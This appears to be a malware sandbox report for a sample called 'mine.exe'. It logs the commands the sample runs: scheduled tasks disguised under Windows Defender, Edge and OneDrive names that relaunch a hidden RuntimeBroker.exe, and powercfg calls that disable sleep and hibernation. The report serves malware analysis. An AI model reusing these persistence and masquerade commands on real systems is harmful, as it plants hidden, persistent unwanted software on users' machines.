CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 1700 thread_handle: 0x000000f4 process_identifier: 1836 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2272 thread_handle: 0x000000f4 process_identifier: 2264 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2368 thread_handle: 0x000000f4 process_identifier: 2300 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2756 thread_handle: 0x000000f4 process_identifier: 1692 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2384 thread_handle: 0x000000f4 process_identifier: 2392 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2940 thread_handle: 0x000000f4 process_identifier: 2712 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2164 thread_handle: 0x000000f4 process_identifier: 2156 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2128 thread_handle: 0x000000f4 process_identifier: 2292 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk328" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2792 thread_handle: 0x000000f4 process_identifier: 2772 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk115" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2692 thread_handle: 0x000000f4 process_identifier: 2432 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2080 thread_handle: 0x000000f4 process_identifier: 2744 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk237" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2272 thread_handle: 0x000000f4 process_identifier: 2488 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2652 thread_handle: 0x000000f4 process_identifier: 2776 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\powercfg.exe track: 1 command_line: powercfg /x -hibernate-timeout-ac 0 filepath_r: C:\Windows\system32\powercfg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2728 thread_handle: 0x000000f8 process_identifier: 2736 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\powercfg.exe track: 1 command_line: powercfg /x -hibernate-timeout-dc 0 filepath_r: C:\Windows\system32\powercfg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f4	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 1752 thread_handle: 0x000000f4 process_identifier: 1228 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\powercfg.exe track: 1 command_line: powercfg /x -standby-timeout-ac 0 filepath_r: C:\Windows\system32\powercfg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2280 thread_handle: 0x000000f8 process_identifier: 3024 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\powercfg.exe track: 1 command_line: powercfg /x -standby-timeout-dc 0 filepath_r: C:\Windows\system32\powercfg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f4	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2500 thread_handle: 0x000000f4 process_identifier: 2668 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\powercfg.exe track: 1 command_line: powercfg /hibernate off filepath_r: C:\Windows\system32\powercfg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2272 thread_handle: 0x000000f8 process_identifier: 1984 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f4	1	1

mine.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All